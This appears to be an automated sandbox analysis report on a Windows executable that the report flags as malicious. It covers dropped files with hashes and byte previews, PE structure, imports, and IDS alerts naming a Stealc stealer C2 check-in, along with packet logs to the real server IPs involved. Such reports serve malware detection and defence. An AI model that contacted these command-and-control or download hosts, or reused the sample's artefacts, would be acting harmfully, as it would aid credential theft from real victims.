                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.0.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAF8.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4565
                                                          Entropy (8bit):4.43801263051237
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zspJg77aI90CyWpW8VYVpYm8M4Jh8Fn+q8y0Bd+Zrd:uIjf7I7ue7Vk4JY02Zrd
                                                          MD5:B77B1F27ABF54CEA629555FE36D9918D
                                                          SHA1:5397489E42EC7F354110EB955586863EF59677F7
                                                          SHA-256:1016CAE3CFB9162EEAB4D9F6415289AFECDC798D019A69875CDDF9130AAD08AC
                                                          SHA-512:09456D8AD0E791BBF580A20DC7477BF8EAEC24D3F536F5CF3013DE99A223B328E31D479A32A3909AEF42BA006E7A6ED91B6C7588A04D5FBD88AA5C2512EDEBE8
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560651" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):402432
                                                          Entropy (8bit):6.631084505190823
                                                          Encrypted:false
                                                          SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                          MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                          SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                          SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                          SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\A865.tmp.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):402432
                                                          Entropy (8bit):6.631084505190823
                                                          Encrypted:false
                                                          SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                          MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                          SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                          SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                          SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.42149195330818
                                                          Encrypted:false
                                                          SSDEEP:6144:WSvfpi6ceLP/9skLmb0OTQWSPHaJG8nAgeMZMMhA2fX4WABlEnNA0uhiTw:1vloTQW+EZMM6DFyq03w
                                                          MD5:CCAF1E1BE758C84C2D0A77D2809C8EFE
                                                          SHA1:3ADFEC9629DC271A37045F331A3F6A315C0C7B44
                                                          SHA-256:7FBC35A627A9514A72E474FC955671A67342FC201AEC1BBF133EF54B9CE9D57E
                                                          SHA-512:174FE51BAE680B836E41A4E528A787C454F8B9AFE411E38F41E6C38D82C36EA601C0661F92F097BA179D084E271EC6DAC9A8736103F217A1935E790F2FCBD30E
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..(..'...............................................................................................................................................................................................................................................................................................................................................Y?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.983658944198319
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.53%
                                                          • InstallShield setup (43055/19) 0.43%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:GK059kPZ5B.exe
                                                          File size:465'920 bytes
                                                          MD5:9883fdabd29a18139bd1cadedf550f35
                                                          SHA1:b05c71cb505793c12a728daeaf069b90ea289d6d
                                                          SHA256:2d982e9ce07d6b2d0359f388c0cc0e2ad3fc3bed3b44236ef9d442abcaf44f30
                                                          SHA512:97a8ab2a2e370fe007194776b9286ff1d068c7d4842f88ea493814d5b2efcf20e75ceb5f253a5235f71045c3264ca226b77d9c8234b9fdbacd1572891d55ed65
                                                          SSDEEP:6144:6mQ87bcIbcd8HEZXx+ltIWVnp2Y0kbQ3PdJmNoA6ZyVNp/ononRE5oCGo:hNbcd3Mt9XhsoA6/Bn
                                                          TLSH:5EA4AD1162F16912FEB767325A3B86DCD66FBC62DE38624EA1107E0F09733B1C562712
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...v?..9...k-..9...k<..9...k*..9.......9...9...9...k#..9...k=..9...k8..9..Rich.9..........................PE..L..

                                                          File Icon

                                                          Icon Hash:46c7c30b0f4e0d59

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4016ea
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x65B8CDCD [Tue Jan 30 10:22:05 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:1e66c5ab7046eb4aa399af840cbcb451

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F325CE74E78h
                                                          jmp 00007F325CE7180Dh
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000328h
                                                          mov dword ptr [00450478h], eax
                                                          mov dword ptr [00450474h], ecx
                                                          mov dword ptr [00450470h], edx
                                                          mov dword ptr [0045046Ch], ebx
                                                          mov dword ptr [00450468h], esi
                                                          mov dword ptr [00450464h], edi
                                                          mov word ptr [00450490h], ss
                                                          mov word ptr [00450484h], cs
                                                          mov word ptr [00450460h], ds
                                                          mov word ptr [0045045Ch], es
                                                          mov word ptr [00450458h], fs
                                                          mov word ptr [00450454h], gs
                                                          pushfd
                                                          pop dword ptr [00450488h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [0045047Ch], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [00450480h], eax
                                                          lea eax, dword ptr [ebp+08h]
                                                          mov dword ptr [0045048Ch], eax
                                                          mov eax, dword ptr [ebp-00000320h]
                                                          mov dword ptr [004503C8h], 00010001h
                                                          mov eax, dword ptr [00450480h]
                                                          mov dword ptr [0045037Ch], eax
                                                          mov dword ptr [00450370h], C0000409h
                                                          mov dword ptr [00450374h], 00000001h
                                                          mov eax, dword ptr [0044F004h]
                                                          mov dword ptr [ebp-00000328h], eax
                                                          mov eax, dword ptr [0044F008h]
                                                          mov dword ptr [ebp-00000324h], eax
                                                          call dword ptr [000000F0h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [C++] VS2008 build 21022
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4db5c0x3c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x12f0000x204f8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4d7180x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x4c0000x1b0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x4a2a00x4a400f4796f0971fe2ac5e4cce90265480543False0.8783045296717171data7.663584602800402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x4c0000x25280x2600edc34630a03278df9e77f984746baea8False0.3763363486842105data5.450403547853696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x4f0000xdf67c0x4800465c92e90ab6ce0d9e7b87c43a50d6a5False0.051323784722222224data0.6176250109411573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x12f0000x204f80x206007c822f30a164341ae0dcddd5f9e9f33aFalse0.4794582528957529data5.40270524469097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_CURSOR0x1475e80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                          RT_CURSOR0x1477180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                          RT_ICON0x12fac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                                          RT_ICON0x1309680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                                          RT_ICON0x1312100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                                          RT_ICON0x1318d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                                          RT_ICON0x131e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                                          RT_ICON0x1343e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                                          RT_ICON0x1354900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                                          RT_ICON0x135e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                                          RT_ICON0x1362f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                                          RT_ICON0x1371a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                                          RT_ICON0x137a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                                          RT_ICON0x1381100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                                          RT_ICON0x1386780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                                          RT_ICON0x13ac200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                                          RT_ICON0x13bcc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                                          RT_ICON0x13c6500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                                          RT_ICON0x13cb300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                                          RT_ICON0x13d9d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                                          RT_ICON0x13e2800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                                          RT_ICON0x13e9480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                                          RT_ICON0x13eeb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                                          RT_ICON0x13ff580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                                          RT_ICON0x1408e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                                          RT_ICON0x140db00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.8219616204690832
                                                          RT_ICON0x141c580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.858754512635379
                                                          RT_ICON0x1425000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.8099078341013825
                                                          RT_ICON0x142bc80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7528901734104047
                                                          RT_ICON0x1431300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.8047717842323652
                                                          RT_ICON0x1456d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.8332551594746717
                                                          RT_ICON0x1467800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.8434426229508196
                                                          RT_ICON0x1471080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8643617021276596
                                                          RT_STRING0x149e980x9adata0.6038961038961039
                                                          RT_STRING0x149f380x6dadata0.4264538198403649
                                                          RT_STRING0x14a6180x4aadata0.4455611390284757
                                                          RT_STRING0x14aac80x4dcdata0.4429260450160772
                                                          RT_STRING0x14afa80x7d4data0.41966067864271456
                                                          RT_STRING0x14b7800x718data0.42841409691629956
                                                          RT_STRING0x14be980x696data0.4359430604982206
                                                          RT_STRING0x14c5300x616data0.43902439024390244
                                                          RT_STRING0x14cb480x7dedata0.41807348560079444
                                                          RT_STRING0x14d3280x5c6data0.4370771312584574
                                                          RT_STRING0x14d8f00x5d8data0.44385026737967914
                                                          RT_STRING0x14dec80x588data0.4392655367231638
                                                          RT_STRING0x14e4500x616data0.43838254172015406
                                                          RT_STRING0x14ea680x4eedata0.4548335974643423
                                                          RT_STRING0x14ef580x5a0data0.4354166666666667
                                                          RT_GROUP_CURSOR0x149cc00x22data1.0588235294117647
                                                          RT_GROUP_ICON0x1475700x76dataTurkishTurkey0.6694915254237288
                                                          RT_GROUP_ICON0x1362800x76dataTurkishTurkey0.6610169491525424
                                                          RT_GROUP_ICON0x140d480x68dataTurkishTurkey0.7211538461538461
                                                          RT_GROUP_ICON0x13cab80x76dataTurkishTurkey0.6694915254237288
                                                          RT_VERSION0x149ce80x1b0data0.5856481481481481

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                                          WINHTTP.dllWinHttpOpenRequest

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          TurkishTurkey

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-26T19:08:32.658480+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704172.67.179.207443TCP
                                                          2024-10-26T19:08:33.704551+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705176.113.115.3780TCP
                                                          2024-10-26T19:08:41.936068+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970762.204.41.17780TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 26, 2024 19:08:31.482039928 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:31.482068062 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:31.482131004 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:31.496459961 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:31.496476889 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.139048100 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.139190912 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.240453959 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.240490913 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.241519928 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.241584063 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.245240927 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.291333914 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.658416986 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.658605099 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.658628941 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.658652067 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.658674955 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.658708096 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.670676947 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.670713902 CEST44349704172.67.179.207192.168.2.5
                                                          Oct 26, 2024 19:08:32.670737028 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.670790911 CEST49704443192.168.2.5172.67.179.207
                                                          Oct 26, 2024 19:08:32.796578884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:32.802144051 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:32.802299023 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:32.802376986 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:32.808233023 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704457045 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704480886 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704499960 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704513073 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704524040 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704535007 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704550982 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.704555035 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704570055 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704581022 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704592943 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.704612017 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.704643011 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.710000038 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.710021973 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.710087061 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.710113049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.852870941 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.852907896 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.852945089 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.852945089 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853024006 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853045940 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853058100 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853066921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853120089 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853120089 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853374958 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853399038 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853410959 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853421926 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.853440046 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853440046 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853473902 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.853473902 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.854768038 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854779959 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854792118 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854824066 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.854854107 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854865074 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854871988 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.854878902 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854897022 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854907036 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:33.854914904 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.854914904 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.854929924 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:33.854980946 CEST4970580192.168.2.5176.113.115.37
